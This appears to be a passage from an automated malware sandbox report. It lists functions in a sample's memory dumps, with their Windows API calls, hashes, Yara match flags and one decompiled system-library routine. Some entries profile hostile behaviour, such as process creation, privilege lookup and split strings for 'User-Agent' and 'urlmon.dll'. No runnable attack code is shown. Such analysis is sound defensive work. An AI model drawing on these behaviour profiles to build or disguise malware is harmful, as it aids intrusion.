                          Download Yara Rule
                          APIs
                          • NtClose.NTDLL(01114D10,?,?,01114D10,00000000,FFFFFFFF), ref: 01119EA5
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: bc5b2de0da1b5ef0375440ba87564657268f0f0a75ea414756b91c00acfdd9db
                          • Instruction ID: d99dc521551ce44f72c482a0b8584fa670413170cb2de95f03477afd2c5f5ba5
                          • Opcode Fuzzy Hash: bc5b2de0da1b5ef0375440ba87564657268f0f0a75ea414756b91c00acfdd9db
                          • Instruction Fuzzy Hash: EAE0C235200108AFD714EFA8CC89FE7BB69EF48360F0641AAFA5C9B241D631F650C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01119E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtClose.NTDLL(01114D10,?,?,01114D10,00000000,FFFFFFFF), ref: 01119EA5
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                          • Instruction ID: 3347a71d538934e9e7c0972bb61819734bec4f855e42999d5b807cf34c2af793
                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                          • Instruction Fuzzy Hash: 1ED012752002146BD714EB98DC45E977B5DEF44660F154455BA5C5B241D530F50086E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05119540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 277c24a3ae76205babb39866eadc79d176fc80445e25a2e12855662ff1d29a37
                          • Instruction ID: bbcd566270ae5a36165f943b3c102fc93d555112d733ac7808b5a46bbf4404f5
                          • Opcode Fuzzy Hash: 277c24a3ae76205babb39866eadc79d176fc80445e25a2e12855662ff1d29a37
                          • Instruction Fuzzy Hash: 67900265211010030105A5595744507005697D53A13A1C425F5046550CD76588726161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 051195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 9cfd50445cc1073e38d8b6d516dc1b2669f5b0286eaabe0ca66be6f5a82c2469
                          • Instruction ID: 88911117d436cd714a8dba63b2ae5db51d07a616a5de9ac856458c58fcc2391e
                          • Opcode Fuzzy Hash: 9cfd50445cc1073e38d8b6d516dc1b2669f5b0286eaabe0ca66be6f5a82c2469
                          • Instruction Fuzzy Hash: B69002A120201003410571599554616401A97E0251BA1C425E5045590DC66988B27165
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05119FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: a6f0f07a2dc3abd482b861b9ddcee352f925f905204003cadf6fc82443a7da2e
                          • Instruction ID: d996a2f8ac9936d924da2ee93eb3079b32f6c1ec7c82361af0d9782efb43a725
                          • Opcode Fuzzy Hash: a6f0f07a2dc3abd482b861b9ddcee352f925f905204003cadf6fc82443a7da2e
                          • Instruction Fuzzy Hash: 3C90027131115402D1106159D544706001597D1251FA1C815A4855558D87D988B27162
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05119660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: eb503d4eecd981301e3ec677a4c314a8a72bc8b052d55960edac99bd32be9ca8
                          • Instruction ID: 7e5237235e28ff490010bbf039c42fc8ca85c9ad7b3dddb19315fe3474672ef1
                          • Opcode Fuzzy Hash: eb503d4eecd981301e3ec677a4c314a8a72bc8b052d55960edac99bd32be9ca8
                          • Instruction Fuzzy Hash: C190027120101802D1807159954464A001597D1351FE1C419A4056654DCB598A7A77E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 051196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: f2ddcfa9f10482cce65deef864f17b114ff95710a91816ff10871b7919261d57
                          • Instruction ID: 4aba79cbebfd857e7bd31faf1c48bfdbf109c9ecd989239088161b693524f06e
                          • Opcode Fuzzy Hash: f2ddcfa9f10482cce65deef864f17b114ff95710a91816ff10871b7919261d57
                          • Instruction Fuzzy Hash: F390027120109802D1106159D54474A001597D0351FA5C815A8455658D87D988B27161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05119910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: aff5ad1b06e49bc6b240e04325d3f83bc1a161d79be7263a7c59fc96ca3b9a7f
                          • Instruction ID: 58c5e760464fe095f098d93c5af7571e569acef412831fc42567186e5319c6cd
                          • Opcode Fuzzy Hash: aff5ad1b06e49bc6b240e04325d3f83bc1a161d79be7263a7c59fc96ca3b9a7f
                          • Instruction Fuzzy Hash: 9C9002B120101402D14071599544746001597D0351FA1C415A9095554E879D8DF676A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05119860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 47d337e2a5ada1398d80c8fc2e186e0dda09a842cb55e6f6174e4da257e0fb1f
                          • Instruction ID: e79d497553d0e28d6e91e90be2935fcb506812286e352f37dc1f034e1e40dcfe
                          • Opcode Fuzzy Hash: 47d337e2a5ada1398d80c8fc2e186e0dda09a842cb55e6f6174e4da257e0fb1f
                          • Instruction Fuzzy Hash: 5E90027120101413D11161599644707001997D0291FE1C816A4455558D979A8973B161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05119A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 5f94002a8f07986864f21debde665e3b46c435d97b1f1d751d62f5966365f971
                          • Instruction ID: 9969846dc318712bd867f165d4c9aec9d888d34bf1c61a97c6dd05b92730539b
                          • Opcode Fuzzy Hash: 5f94002a8f07986864f21debde665e3b46c435d97b1f1d751d62f5966365f971
                          • Instruction Fuzzy Hash: AB90026121181042D20065699D54B07001597D0353FA1C519A4185554CCA5988726561
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111A052, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01103AF8), ref: 0111A08D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID: .z`
                          • API String ID: 3298025750-1441809116
                          • Opcode ID: b937e32ce4266e2ff634f2e213fc7bb1e8e5b5862f511af502ff14cc14d7b27a
                          • Instruction ID: b961b236c864e9db217d0e5897c75100b8276ff7a594aa3ada5b10961eed270b
                          • Opcode Fuzzy Hash: b937e32ce4266e2ff634f2e213fc7bb1e8e5b5862f511af502ff14cc14d7b27a
                          • Instruction Fuzzy Hash: D5E068B80003864FDB04EE38D4D14673B85EF802207008A8ADC9943202C120C81987A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01103AF8), ref: 0111A08D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID: .z`
                          • API String ID: 3298025750-1441809116
                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                          • Instruction ID: 2a8386d6140cda5c99d390154a1da034149f62ee04be6bdf84290916c1cb6ffa
                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                          • Instruction Fuzzy Hash: E8E012B5200209ABDB18EF99DC49EA777ADAF88660F018559BA585B241D630E9108AB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111A0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0111A124
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateInternalProcess
                          • String ID:
                          • API String ID: 2186235152-0
                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                          • Instruction ID: f2e216fd32879efb6381e37faba715e3f2a091e0856d03cd56287404c5727d67
                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                          • Instruction Fuzzy Hash: 5D01B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA4D97240D630E851CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                          Download Yara Rule
                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0110F192,0110F192,?,00000000,?,?), ref: 0111A1F0
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                          • Instruction ID: 3262446e0ead47c6974b36210042029cae56b8c88df654cfd8c3eab28a92c276
                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                          • Instruction Fuzzy Hash: 64E01AB52002086BDB14DF49DC85EE777ADAF88650F018165BA4C57241DA30E8108BF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111A020, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(011144F6,?,01114C6F,01114C6F,?,011144F6,?,?,?,?,?,00000000,00000000,?), ref: 0111A04D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                          • Instruction ID: 011df9eb4c85469efcbd5cc15ef5a1e1f07bca90adffb4dbd32e68aefb3c71df
                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                          • Instruction Fuzzy Hash: B4E012B5200208ABDB18EF99DC41EA777ADAF88664F118559BA585B241C630F9108AB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0511967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 6d73d66f77fbb60e1817ec8fbd3166ac7660ef8481fbd5779595a4efe0af1e4c
                          • Instruction ID: 5680a3f7a9868f2d395f82bd54acf89f62043df59c78b2e8475889b4dca70bdc
                          • Opcode Fuzzy Hash: 6d73d66f77fbb60e1817ec8fbd3166ac7660ef8481fbd5779595a4efe0af1e4c
                          • Instruction Fuzzy Hash: 6CB02BB18010C0C5D600D3604708B27390077C0300F22C061D2020640A033CC0A1F1B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 01117295, Relevance: 6.3, Strings: 5, Instructions: 80COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Us$: $er-A$gent$urlmon.dll
                          • API String ID: 0-1367105278
                          • Opcode ID: 322ff36b181f73603f449628b60f3b565e0af28169e45aa51266f965256259f0
                          • Instruction ID: 69d559396695928a5b3143cf9da36f3bc9a0a3ea06cf2dd99cdfab7598fc3310
                          • Opcode Fuzzy Hash: 322ff36b181f73603f449628b60f3b565e0af28169e45aa51266f965256259f0
                          • Instruction Fuzzy Hash: 38118C72E0521A56EB159F94EC02BFEFB74EF51714F140165EC086B388D379990287DA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 011172A5, Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4d5977a9876430e3fb2b3be42c66cb8de91bd652987bb57eace2de961647bb6b
                          • Instruction ID: ea0d7bc5f4d0d99ffa8c56509fe9ee83083abdf3bc359906aa36301fcef11da0
                          • Opcode Fuzzy Hash: 4d5977a9876430e3fb2b3be42c66cb8de91bd652987bb57eace2de961647bb6b
                          • Instruction Fuzzy Hash: 98E06836E4A1508A6B19ADADB4050EAFF20E99B06476432A6CC0C6B34AC622D811CAC6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0516FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                          Download Yara Rule
                          C-Code - Quality: 53%
                          			E0516FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0511CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05165720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05165720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                          0x0516fdda
                          0x0516fde2
                          0x0516fde5
                          0x0516fdec
                          0x0516fdfa
                          0x0516fdff
                          0x0516fe0a
                          0x0516fe0f
                          0x0516fe17
                          0x0516fe1e
                          0x0516fe19
                          0x0516fe19
                          0x0516fe19
                          0x0516fe20
                          0x0516fe21
                          0x0516fe22
                          0x0516fe25
                          0x0516fe40

                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0516FDFA
                          Strings
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0516FE2B
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0516FE01
                          Memory Dump Source
                          • Source File: 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: true
                          • Associated: 0000000D.00000002.934958079.00000000051CB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000D.00000002.934976641.00000000051CF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                          • API String ID: 885266447-3903918235
                          • Opcode ID: bac6bce8fd681173f0631035ac24ffbe765c2f7702ca13f0ebbbfc3a3a4a79ca
                          • Instruction ID: 352cf94694365940238fc19c82bf03232e4cef00eded22cebe0832e0afc8dfd6
                          • Opcode Fuzzy Hash: bac6bce8fd681173f0631035ac24ffbe765c2f7702ca13f0ebbbfc3a3a4a79ca
                          • Instruction Fuzzy Hash: 36F04636240201BFD6201A45EC06F27BF5BEB40730F154314F6284A5D1DB62F87092F4
                          Uniqueness

                          Uniqueness Score: -1.00%